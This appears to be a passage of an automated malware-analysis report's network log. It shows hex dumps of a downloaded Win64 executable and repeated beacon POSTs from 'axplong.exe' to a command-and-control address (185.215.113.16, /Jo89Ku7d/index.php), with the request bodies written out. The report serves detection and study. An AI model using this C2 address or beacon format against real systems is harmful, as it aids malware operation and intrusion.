10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 d0 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win64$7PEdrf"+@@ ``"P(t.text0 `.data}~@.bss,`.idata"P`RD@.didata@.edata`(@@.tlsp.rdatam*@@.reloc,@B.pdata@@.rsrcv@@Z
Jul 26, 2024 12:57:48.364074945 CEST	1236	IN	Data Raw: 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 40 00 00 00 00 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 00 00 00 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 Data Ascii: @@@Boolean@FalseTrueSystem@@AnsiChar`@Char@ShortInt@SmallInt@Integer
Jul 26, 2024 12:57:48.364101887 CEST	1236	IN	Data Raw: 00 00 00 00 00 06 00 00 00 00 00 00 00 02 02 44 33 02 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 02 02 44 34 02 00 02 00 05 00 0b 30 62 41 00 00 00 00 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 12 68 14 40 Data Ascii: D3D40bA&op_Equality@h@Lefth@RightPbA&op_Inequality@h@Lefth@Right`cAEmptyh@pbACreateh@
Jul 26, 2024 12:57:48.364120007 CEST	1236	IN	Data Raw: 17 40 00 00 00 00 00 04 4c 65 66 74 02 00 12 a8 17 40 00 00 00 00 00 05 52 69 67 68 74 02 00 02 00 70 1a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 25 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 Data Ascii: @Left@Rightp@%@p@2@0@@@0@ @`@p@@P@@@@P@`@p@@%:@
Jul 26, 2024 12:57:48.364136934 CEST	1236	IN	Data Raw: 00 00 09 43 6c 61 73 73 49 6e 66 6f 03 00 38 11 40 00 00 00 00 00 18 00 01 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 38 00 b0 cb 40 00 00 00 00 00 0c 49 6e 73 74 61 6e 63 65 53 69 7a 65 03 00 b8 10 40 00 00 00 00 00 18 00 01 00 Data Ascii: ClassInfo8@Self8@InstanceSize@SelfL@InheritsFrom@ Self@AClassK@MethodAddress8@ Selfp@
Jul 26, 2024 12:57:48.364152908 CEST	1236	IN	Data Raw: 08 c8 25 40 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 08 c8 25 40 00 00 00 00 00 00 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 38 11 40 00 00 00 00 00 00 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 3d 00 60 d3 40 00 00 00 00 00 11 41 Data Ascii: %@Self%@ExceptObject8@ExceptAddr=`@AfterConstruction%@Self=p@BeforeDestruction%@SelfI@Dispatch %@Self
Jul 26, 2024 12:57:48.364171028 CEST	1236	IN	Data Raw: 00 00 00 00 00 07 0d 57 65 61 6b 41 74 74 72 69 62 75 74 65 e8 27 40 00 00 00 00 00 e0 26 40 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 29 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: WeakAttribute'@&@System)@ )@)@)@&@0@@@0@ @`@p@@P@@@@P@`@p@
Jul 26, 2024 12:57:48.364475012 CEST	1236	IN	Data Raw: 00 40 ca 40 00 00 00 00 00 50 cc 40 00 00 00 00 00 60 ca 40 00 00 00 00 00 70 ca 40 00 00 00 00 00 80 ca 40 00 00 00 00 00 00 00 02 00 2e 2d 40 00 00 00 00 00 44 00 f1 ff 73 2d 40 00 00 00 00 00 44 00 f1 ff 00 00 0f 48 50 50 47 45 4e 41 74 74 72 Data Ascii: @@P@`@p@@.-@Ds-@DHPPGENAttributeEp@Create(-@Selfp@ADataX@Create0-@Self@AFlagp@AData
Jul 26, 2024 12:57:48.364506006 CEST	1236	IN	Data Raw: 00 00 00 00 00 78 32 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 33 40 00 00 00 00 00 78 32 40 00 00 00 00 00 9f 32 40 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 32 40 00 00 00 00 00 18 00 00 00 00 Data Ascii: x2@3@x2@2@2@@0@@@0@ @`@p@@P@@@@P@`@p@@8@FController
Jul 26, 2024 12:57:48.364655972 CEST	556	IN	Data Raw: 00 00 00 00 00 02 05 46 6c 61 67 73 02 00 b8 10 40 00 00 00 00 00 04 00 00 00 00 00 00 00 02 0b 45 6c 65 6d 65 6e 74 53 69 7a 65 02 00 b8 10 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 09 4c 6f 63 6b 43 6f 75 6e 74 02 00 38 11 40 00 00 00 00 00 Data Ascii: Flags@ElementSize@LockCount8@Data5@Bounds7@TVarRecord8@PRecord8@RecInfoh7@TVarData
Jul 26, 2024 12:57:48.369556904 CEST	1236	IN	Data Raw: 74 72 02 00 38 11 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 09 56 44 69 73 70 61 74 63 68 02 00 28 14 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 06 56 45 72 72 6f 72 02 00 00 13 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 08 56 42 6f 6f 6c Data Ascii: tr8@VDispatch(@VError@VBoolean8@VUnknownx@VShortInt@VByte@VWord@VLongWordX@VI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	60837	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:47.857928991 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:48.616753101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:48.617525101 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:48.870975971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	60838	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:48.981183052 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:49.748295069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:49.749115944 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:50.002336979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	60839	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:50.122297049 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:50.867477894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:50.869848967 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:51.114573956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	60840	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:51.231796980 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:52.025482893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:52.026288033 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:52.283910990 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	60841	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:52.405078888 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:53.196537018 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:53.199971914 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:53.451436043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	60843	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:53.561661959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:54.315711021 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:54.316674948 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:54.598886013 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	60844	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:54.716548920 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:55.511126995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:55.511715889 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:55.845648050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	60845	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:55.965672016 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:56.833089113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:56.838242054 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:57.088809013 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	60846	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:57.200450897 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:57.940565109 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:57.941303968 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:58.190505028 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	60847	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:58.311563015 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:59.103247881 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:59.105772018 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:59.379947901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	60849	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
